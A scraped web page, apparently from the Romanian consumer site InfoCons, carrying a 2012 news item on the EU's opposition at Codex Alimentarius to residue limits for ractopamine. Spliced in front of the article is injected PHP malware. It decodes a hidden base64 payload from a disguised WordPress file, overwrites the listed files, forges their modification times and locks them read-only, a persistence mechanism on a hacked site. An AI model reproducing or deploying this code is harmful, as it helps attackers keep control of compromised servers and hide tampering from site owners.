$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Codex Alimentarius: Declaratia UE in privinta Ractopaminei – O noua atitudine

Comisia Codex Alimentarius, infiintata de FAO si Organizatia Mondiala a Sanatatii in 1963, dezvolta standarde armonizate international alimentare, orientari si coduri de practica pentru a proteja starea de sanatate a consumatorilor si pentru a asigura practici corecte comerciale in comertul cu produse alimentare. Comisia promoveaza, de asemenea, coordonarea tuturor activitatilor in privinta standardelor alimentare desfasurata de organizatii internationale guvernamentale si non-guvernamentale.

In urma votului din 05.07.2012 a Codex  Alimentarius, Uniunea Europeana isi reafirma pozitia conform careia un standard international pentru ractopamina nu este justificata.Uniunea Europeana se opune ferm la adoptarea limitelor maxime de reziduuri pentru substanta de crestere, ractopamina, la porci si vite, existand in continuare probleme deosebite de securitate. Organismul Uniunii Europene de evaluare a riscurilor, Autoritatea Europeana pentru Siguranta Alimentara, a ajuns la concluzia ca nu exista date suficiente care sa faca o propunere de limite maxime reziduale pentru ractopamina si ca, astfel, riscurile pentru sanatatea umana, nu pot fi excluse. Uniunea Europeana, impreuna cu alte tari europene, aproape 45 de tari, a fost sustinuta de un numar coplesitor de natiuni si anume: China, Federatia Rusa, India, Turcia, Iran, Egipt, Kenya, Zimbabwe si altele. Aceste tari au indicat ca isi vor mentine pozitiile si nu aproba utilizarea acestei substante de crestere. Decizia a fost luata la diferenta de un singur vot. Comisia Europeana a reprezentat interesele UE, in cadrul celei de a 35-a sesiuni anuale a Codex Alimentarius, care are loc intre 2 si 7 iulie 2012 la Roma. Reunind 185 de tari membre, scopul Codex a fost de a adopta standardele acceptate pe plan international cu privire la siguranta alimentara si calitatea alimentelor.

 

Sursa: DG SANCO

10.07.2012

By o9admin